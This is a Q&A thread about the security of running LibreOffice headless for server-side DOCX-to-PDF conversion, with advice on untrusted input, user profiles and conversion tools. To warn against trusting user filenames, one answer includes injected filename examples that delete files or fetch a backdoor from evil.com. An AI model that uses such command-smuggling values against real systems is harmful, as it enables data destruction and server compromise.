Reputation: 2517
I have my-template.docx that I convert into my-report.docx with OpenXml and then into my-report.pdf with:
soffice --headless --convert-to pdf my-report.docx
I feel compelled to say that this functionality is very much appreciated 🙌. Anyway, one thing I can't find an answer to here (cli documentation), here (comparison with MS Office), or in my other post is whether LibreOffice is safe for automation.
See this post from Microsoft that says not to use Word for server-side automation. That raises the question: is LibreOffice safe for server-side automation? Basically, I will be using C# to run soffice --headless --convert-to pdf my-report.docx any time a request for a report comes in.
Is that safe?
*assume nobody else is trying to read my-report.docx
Upvotes: 12
Views: 15574
Reputation: 57418
I have my-template.docx that I convert into my-report.docx with OpenXml and then my-report.pdf with:
soffice --headless --convert-to pdf my-report.docx
What you're almost certainly doing is replacing some information inside the DOCX and using LibreOffice to have a "nice" conversion to PDF. While there are other tools that might do something like that (wkhtmltopdf for example), you're not using LibreOffice in any vulnerable way that I'm aware of (and I use LibreOffice like you do too):
Possible but unlikely "exploit" avenues that might remain:
Content-Disposition: attachment; filename="thatswhatshesaid";, not using the user's filename on your filesystem and risking saving data to byebye.pdf && rm -rf ... (or irrelevant.pdf\x00; curl -o index2.php http://evil.com/backdoor.php or...), sending back a Location: downloads/whatshesaid.pdf.
Upvotes: 5
Reputation: 6581
Moggi's answer is a great one. The only things I can add are:
I hope that helps.
Upvotes: 3
Reputation: 1486
As long as you control the content of the input file there should be no issue at all. Keep in mind that LibreOffice only allows one active instance per user profile, so if you want to be able to process more than one document in parallel you should use separate user profiles.
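A minimal sketch of the separate-profile idea, written in Python for brevity (the same argument list can be passed from C#). It assumes soffice is on the PATH and relies on the -env:UserInstallation bootstrap variable to point each run at its own throwaway profile directory. The function names, the 120-second timeout, and the use of --outdir are illustrative choices, not something stated in this thread.

```python
import subprocess
import tempfile
from pathlib import Path


def build_convert_command(docx_path, out_dir, profile_dir, soffice="soffice"):
    """Build the soffice argument list for one isolated conversion.

    profile_dir is a directory used only by this run, so several
    conversions can execute in parallel without sharing a user profile.
    """
    # UserInstallation expects a file:// URI, not a plain path.
    profile_uri = Path(profile_dir).resolve().as_uri()
    return [
        soffice,
        f"-env:UserInstallation={profile_uri}",
        "--headless",
        "--convert-to", "pdf",
        "--outdir", str(out_dir),
        str(docx_path),
    ]


def convert_to_pdf(docx_path, out_dir, timeout=120):
    """Run one conversion with a temporary profile (hypothetical helper)."""
    with tempfile.TemporaryDirectory(prefix="lo-profile-") as profile_dir:
        cmd = build_convert_command(docx_path, out_dir, profile_dir)
        # Arguments are passed as a list, so no shell parses the file name.
        # The timeout is an assumed safeguard against a hung conversion.
        subprocess.run(cmd, check=True, timeout=timeout)
    # Assumes soffice names the output after the input file's stem.
    return Path(out_dir) / (Path(docx_path).stem + ".pdf")
```

Calling convert_to_pdf("my-report.docx", "out") from several worker threads or processes would give each conversion its own profile, at the cost of LibreOffice initialising a fresh profile on every run.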
If you have untrusted input data the whole question becomes more complex to answer. While there has been quite a bit of work securing the code base, a desktop office suite is still a huge piece of software with a lot of potential attack surfaces (macros, remote data connections, old binary file formats, ...). While all of these features should be blocked in headless operations you have to trust that there are no undiscovered bugs.
The remaining points in the Microsoft article should not apply to LibreOffice. The headless mode is designed not to interact with the desktop environment and, except for the user profile, does not change anything in the system or depend on any desktop-related component. The default builds will still depend on some GUI libraries, but if that actually becomes a problem there is an experimental build option to build a non-GUI version without any X/GTK/KDE library dependencies.
As an alternative, there are also a few projects built on top of LibreOffice that try to make converting documents even easier and might actually be faster by pre-forking or using the LibreOfficeKit API. Two examples are JODConverter and unoconv.
Upvotes: 17